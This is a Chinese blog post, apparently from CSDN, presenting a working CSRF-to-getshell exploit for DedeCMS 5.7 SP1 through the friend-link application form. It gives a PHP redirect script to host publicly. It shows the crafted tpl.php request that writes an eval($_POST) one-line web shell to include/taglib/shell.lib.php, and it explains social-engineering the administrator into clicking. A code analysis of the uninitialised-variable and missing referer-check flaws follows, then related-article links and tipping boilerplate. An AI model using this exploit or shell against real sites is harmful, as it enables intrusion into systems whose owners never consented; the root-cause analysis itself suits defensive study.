dedecms友情链接plus/flink.php页面出错,DedeCMS友情链接flink_add Getshell漏洞管理员CSRF漏洞...

最新推荐文章于 2021-11-20 14:46:42 发布
最新推荐文章于 2021-11-20 14:46:42 发布
阅读量551 收藏 1
点赞数
文章标签: dedecms友情链接plus/flink.php页面出错

DedeCMS 漏洞 CSRF 代码注入 安全防护
关键词由CSDN通过智能技术生成

DedeCMS友情链接漏洞,DedeCMS漏洞,

1、漏洞利用

由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。

又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞。

因此可以诱导管理员以管理员的权限写入代码即可。

测试版本:DedeCMS-V5.7-UTF8-SP1-Full 20150618

exp:

//print_r($_SERVER);

$referer = $_SERVER['HTTP_REFERER'];

$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径

//拼接 exp

$muma = '';

$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';

$url = $dede_login.$exp;

//echo $url;

header("location: ".$url);

// send mail coder

exit();

?>

首先,将这个exp部署在公网服务器上

http://192.168.113.129/exp.php

在目标网站的申请友情链接处申请一个友情链接

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/plus/flink_add.php

网址填写为先前的 http://192.168.113.129/exp.php, 名称随便填,也可填写诱导性关键字引发管理员好奇心。

提交成功之后等待管理员审核,当管理员审核的时候,一般情况下会点进你的网站看一下(漏洞利用关键)。

管理员审核:

后台 -> 模块 -> 辅助插件 -> 友情链接

当管理员点这个友情链接的时候,就生成了一句话shell,shell地址在/include/taglib/shell.lib.php

事实上,点击新添加的友情链接时,管理员触发了一个HTTP请求:

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php

页面跳转:

成功修改/创建文件!

生成shell地址:

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/include/taglib/shell.lib.php

2、漏洞分析

在tpl.php文件中

/*---------------------------

function savetagfile() { }

保存标签碎片修改

--------------------------*/

else if($action=='savetagfile')

{

if(!preg_match("#^[a-z0-9_-]{1,}.lib.php$#i", $filename))

{

ShowMsg('文件名不合法,不允许进行操作!', '-1');

exit();

}

require_once(DEDEINC.'/oxwindow.class.php');

$tagname = preg_replace("#.lib.php$#i", "", $filename);

$content = stripslashes($content);

$truefile = DEDEINC.'/taglib/'.$filename;

$fp = fopen($truefile, 'w');

fwrite($fp, $content);

fclose($fp);

$msg = "

测试标签:(需要使用环境变量的不能在此测试)

{dede:{$tagname} }{/dede:{$tagname}}

";

$wintitle = "成功修改/创建文件!";

$wecome_info = "标签源码碎片管理 >> 修改/新建标签";

$win = new OxWindow();

$win->AddTitle("修改/新建标签:");

$win->AddMsgItem($msg);

$winform = $win->GetWindow("hand"," ",false);

$win->Display();

exit();

}

这里是漏洞利用写入文件的地方,但是我们知道,基本所有的不安全情况,是在数据输入输出时发生的,这里的参数是怎么传递过来的呢?还有$filename和$content是怎么传递参数的呢?继续跟踪config.php又 include了 common.inc.php ,而一般情况下,类似common.php这种文件名的,里面存放着一些将会经常用到的函数。继续跟踪上去。果然发现了猫腻在common.inc.php 发现了

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

foreach($$_request as $_k => $_v)

{

if($_k == 'nvarname') ${$_k} = $_v;

else ${$_k} = _RunMagicQuotes($_v);

}

}

问题在哪呢? 这段代码大概的意思是 从数组中获取获取参数的方,这里GET,POST,COOKIE方式的参数都有了。

先来跟踪GET,二层循环中$_GET(这个可以看作是一个全局数组)**$_k ,$_v 获取数组的key value值.${$_k}这里全局注册了变量,假如输入GET型参数 ?test=k4l0n.则在本php页及所有包含本页的php页中 , $test的值都被赋值为了kl0n

而tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。

继续跟踪 userLogin类的getUserID函数:

/**

* 获得用户的ID

*

* @access public

* @return int

*/

function getUserID()

{

if($this->userID != '')

{

return $this->userID;

}

else

{

return -1;

}

}

userLogin类用户登录

/**

* 检验用户是否正确

*

* @access public

* @param string $username 用户名

* @param string $userpwd 密码

* @return string

*/

function checkUser($username, $userpwd)

{

global $dsql;

//只允许用户名和密码用0-9,a-z,A-Z,'@','_','.','-'这些字符

$this->userName = preg_replace("/[^0-9a-zA-Z_@!.-]/", '', $username);

$this->userPwd = preg_replace("/[^0-9a-zA-Z_@!.-]/", '', $userpwd);

$pwd = substr(md5($this->userPwd), 5, 20);

$dsql->SetQuery("SELECT admin.*,atype.purviews FROM `dede_admin` admin LEFT JOIN `dede_admintype` atype ON atype.rank=admin.usertype WHERE admin.userid LIKE '".$this->userName."' LIMIT 0,1");

$dsql->Execute();

$row = $dsql->GetObject();

if(!isset($row->pwd))

{

return -1;

}

else if($pwd!=$row->pwd)

{

return -2;

}

else

{

$loginip = GetIP();

$this->userID = $row->id;

$this->userType = $row->usertype;

$this->userChannel = $row->typeid;

$this->userName = $row->uname;

$this->userPurview = $row->purviews;

$inquery = "UPDATE `dede_admin` SET loginip='$loginip',logintime='".time()."' WHERE id='".$row->id."'";

$dsql->ExecuteNoneQuery($inquery);

$sql = "UPDATE dede_member SET logintime=".time().", loginip='$loginip' WHERE mid=".$row->id;

$dsql->ExecuteNoneQuery($sql);

return 1;

}

}

/**

* 保持用户的会话状态

*

* @access public

* @return int 成功返回 1 ,失败返回 -1

*/

function keepUser()

{

if($this->userID != '' && $this->userType != '')

{

global $admincachefile,$adminstyle;

if(empty($adminstyle)) $adminstyle = 'dedecms';

@session_register($this->keepUserIDTag);

$_SESSION[$this->keepUserIDTag] = $this->userID;

@session_register($this->keepUserTypeTag);

$_SESSION[$this->keepUserTypeTag] = $this->userType;

@session_register($this->keepUserChannelTag);

$_SESSION[$this->keepUserChannelTag] = $this->userChannel;

@session_register($this->keepUserNameTag);

$_SESSION[$this->keepUserNameTag] = $this->userName;

@session_register($this->keepUserPurviewTag);

$_SESSION[$this->keepUserPurviewTag] = $this->userPurview;

@session_register($this->keepAdminStyleTag);

$_SESSION[$this->keepAdminStyleTag] = $adminstyle;

PutCookie('DedeUserID', $this->userID, 3600 * 24, '/');

PutCookie('DedeLoginTime', time(), 3600 * 24, '/');

$this->ReWriteAdminChannel();

return 1;

}

else

{

return -1;

}

}

通过跟踪发现,这里没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,这就造成了一个CSRF漏洞。到这里漏洞思路就很清晰了,由于变量可控漏洞导致可写入任意代码,由于CSRF漏洞诱导管理员以管理员的权限去写入代码。

DedeCMS问题解决

请点击在线联系我们【点击咨询解决问题】   如果您有任何织梦问题,我们将免费为您写解决教程!

用心认真写教程不易,请小打赏我们一下,多少是心意,解决问题是重点

【打赏说明】 如果您认为在本站中看的内容质量不错、或阅读后有所收获、或解决您遇到的实际问题,那不妨小金额的赞助一下尚禹科技,让尚禹科技有动力继续写出更多高质量的教程和心得。以帮助更多的人。[查看打赏记录]

配方师k博
关注
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1979
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1750
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
DedeCms 5.7友情链接模块注入漏洞
weixin_30457551的博客
12-13 324
漏洞版本: DedeCms 5.7 漏洞描述: DedeCms基于PHP+MySQL的技术开发,是目前国内应用最广泛的php类CMS系统。 DedeCms 5.7前台提交友情链接处,可以插入恶意JS代码。 <* 参考 http://0day5.com/archives/925http://sebug.net/appdir/织梦(DedeCms) *> ...
DEDECMS最新友情链接getshell漏洞分析
weixin_30815427的博客
03-25 555
先上exp: <?php //print_r($_SERVER); $referer=$_SERVER['HTTP_REFERER']; $dede_login=str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径 //拼接exp $muma='<'...
plus flink add.php,织梦DedeCMS默认友情链接的安全隐患以及处理(图解)
weixin_28907839的博客
04-08 511
接触过dedecms的站长都知道,友情链接路径是plus/flink.php 以及申请链接路径地址:plus/flink_add.php,相信很多站长没有注意到,这些看似正常的链接路径,却存在一个极其问题,那就是模版路径被知晓。废话就说到这里,接下来开始我们的话题。请看下边图文内容。本地测试揭晓存在的问题。请看图1,我们点击所有链接,然后请看下图二:图二:图二中地址栏的地址即是点击所有链接的相对应...
过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用
weixin_39849153的博客
03-11 156
1.php//print_r($_SERVER);$referer=$_SERVER['HTTP_REFERER'];$dede_login=str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径//拼接exp$muma=''.'';$exp='tpl.php?actio...
DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
公众号shadow sock7
11-28 2784
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell 略鸡肋,需要管理员点击。 先在网站最下面点击“申请加入”,然后填入构造的网站链接: http://192.168.170.139:8888/dedecms_csrf.php 然后该链接需要服务器后台可以访问的地址即...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5609
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
祥云杯2021web writeup
hezhing
08-27 3409
太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。 参考师傅们的wp,网上有的,侵权删。
ecw2c理解元数据:使用BigQuery k-means将4,000个堆栈溢出标签聚类
热门推荐
cunehu1722的博客
07-24 6万+
您如何将超过4,000个活动的Stack Overflow标签分组为有意义的组? 对于无监督学习和k均值聚类来说,这是一项完美的任务-现在您可以在BigQuery中完成所有这些工作。 让我们找出方法。 Visualizing a universe of clustered tags. Felipe Hoffais a Developer Advocate fo...
dedecms友情链接plus/flink.php页面出错,织梦DedeCMS默认友情链接页面的安全隐患...
weixin_39581719的博客
03-21 181
织梦DedeCMS的好处什么的就不说了,今天主要讲一下织梦默认的设置里面一些可能会暴露网站模板路径的安全隐患。有人会说织梦模板的路径暴露了有什么的,当然这个路径是非常重要的了,如果你的系统未进行一些相关的设置,在知道你的织梦网站模板路径的情况下,是可以直接下载你的网站模板的。因为织梦的模板文件是.htm结尾的文件,直接在浏览器中输入模板文件的地址,就会看到模板的内容了。当然,出现这样的情况主要还是...
dedecms友情链接plus/flink.php页面出错,dedecms友情链接标签flink使用说明及实例代码...
weixin_28763005的博客
03-21 204
DEDEcms友情链接标签flink用于获取友情链接,其对应后台文件为"includetaglibflink.lib.php",图片复制代码代码如下:{dede:flink row='24' type='image' titlelen="24" typeid="0"}底层标签 [field:link /]{/dede:flink}文字复制代码代码如下:{dede:flink row='24' t...
php flink,plus/flink.php · 辉辉菜/三强源码 - Gitee.com
weixin_39653078的博客
03-11 260
/**** 友情链接** @version $Id: flink.php 1 15:38 2010年7月8日Z tianya $* @package DedeCMS.Site* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.* @license http://help.dedecms.com/...
plus flink_add.php,Flink支持用户自定义资源
weixin_35479284的博客
03-21 217
一、构建JobGraphJobGraph jobGraph = PackagedProgramUtils.createJobGraph(program, flinkConfiguration, parallelism, false);在这个入口中,构建programPackagedProgram program = PackagedProgram.newBuilder().setJarFile(r...
PHP漏洞全解(五)-SQL注入***
weixin_34224941的博客
02-13 183
SQL注入***(SQL Injection),是***者在表单中提交精心构造的sql语句,改动原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入***。   SQL注入***的一般步骤:   1、***者访问有SQL注入漏洞的站点,寻找注入点   2、***者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句   3、新的...
dedecms v5.7(build 20150618)的12个漏洞
ccfxue的博客
06-28 1万+
一打开阿里云后台,发现了12个加急处理的漏洞,还没来得及了解阿里云的漏洞检测原理,直接开始着手修复漏洞searching on baidu... ...  : )1.dedecms支付模块注入漏洞 描述:DEDECMS支付插件存在SQL注入漏洞,此漏洞存在于/include/payment/alipay.php文件中,对输入参数$_GET['out_trade_no']未进行严格过滤。解决:找到 ...
flink add.php,Dedecms如何修改友情链接的格式{dede:flink/}
weixin_35651329的博客
03-23 170
从昨天晚上这个时候开始,到现在位置,我一直在修复我的dedecms的网站,主要原因是网站在8月份的时候遭到入侵,后台系统升级了杀了毒,随后一直都没有时间更新网站。最近腾出时间专门做网站,没想到网站内问题百出,本文主要是记录一下dedecms友情链接模板文件的位置,在include目录下,以此判断,是否dedecms后台重要的文件都在dedecms文件目录下呢?不清不楚不明不白!dedecms默认的...
DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
arthur2612的博客
01-07 483
DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1、漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。 又由于应用没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,从而造成了CSRF漏洞。 因此可以诱导管理员管理员的权限写入代码即可。 测试版本:DedeCMS...
【安全漏洞DedeCMS-5.8.1 SSTI模板注入导致RCE
HBohan的博客
11-20 2019
漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现 漏环境搭建 【技术学习资料】 漏洞复现 这里使用phpstudy来搭建环境 网站前台:http://192.168.59.1/index.php?upcache=1 网站后台: http://192.
sudo mv ./ flink-1.9.1 ./flink mv: 目标'./flink' 不是目录
最新发布
11-18
根据提供的引用,`sudo mv ./ flink-1.9.1 ./flink`这个命令的作用是将当前目录下的所有文件和文件夹移动到名为`flink-1.9.1`的目录下,并将`flink-1.9.1`目录重命名为`flink`,然后将`flink`目录的所有者和所属组都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值